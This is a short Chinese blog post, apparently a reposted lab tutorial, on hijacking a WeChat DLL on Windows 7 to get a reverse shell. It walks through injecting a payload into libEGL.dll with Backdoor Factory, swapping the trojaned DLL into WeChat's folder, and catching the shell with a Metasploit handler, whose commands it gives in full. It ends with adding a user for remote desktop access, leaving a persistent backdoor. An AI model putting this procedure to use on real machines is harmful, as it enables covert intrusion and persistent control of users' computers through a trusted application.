首页 > 微信 > 详细

微信DLL劫持反弹shell

时间:2019-10-10 00:36:01      阅读:139      评论:0      收藏:0      [点我收藏+]

一、操作环境

  Windows7 :  微信  , Process Explorer(任务管理工具,本实验中用于查找微信程序调用的DLL文件)

  Kali Linux  :  BDF(劫持工具,可用于DLL注入)

  可以互相ping通

二、操作步骤

  Step1:在win7中打开微信和Process Explorer,在Process Explorer中找到微信进程,再找到微信调用的DLL文件,如:libEGL.dll

技术分享图片

技术分享图片

   Step2:将该文件拷贝到Kali的BDF工具目录下;

技术分享图片

   Step3:运行backdoor.py,向libEGL.dll中注入

技术分享图片

 技术分享图片

技术分享图片

   Step4:将注入完成的文件拷贝到win7微信的原位置,替换掉原文件,记得先关闭微信;

技术分享图片

   Step5:在Kali开启postgresql,运行MSF;

service postgresql start
msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp 
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost kali的IP
msf5 exploit(multi/handler) > set lport 6666
msf5 exploit(multi/handler) > run

  Step6:在win7中运行微信;

技术分享图片

   Step7:添加用户,在Kali使用rdesktop远程登陆win7。

技术分享图片

技术分享图片

 至此,便在win7电脑留下后门。 

微信DLL劫持反弹shell

原文:https://www.cnblogs.com/yuanshu/p/11644324.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!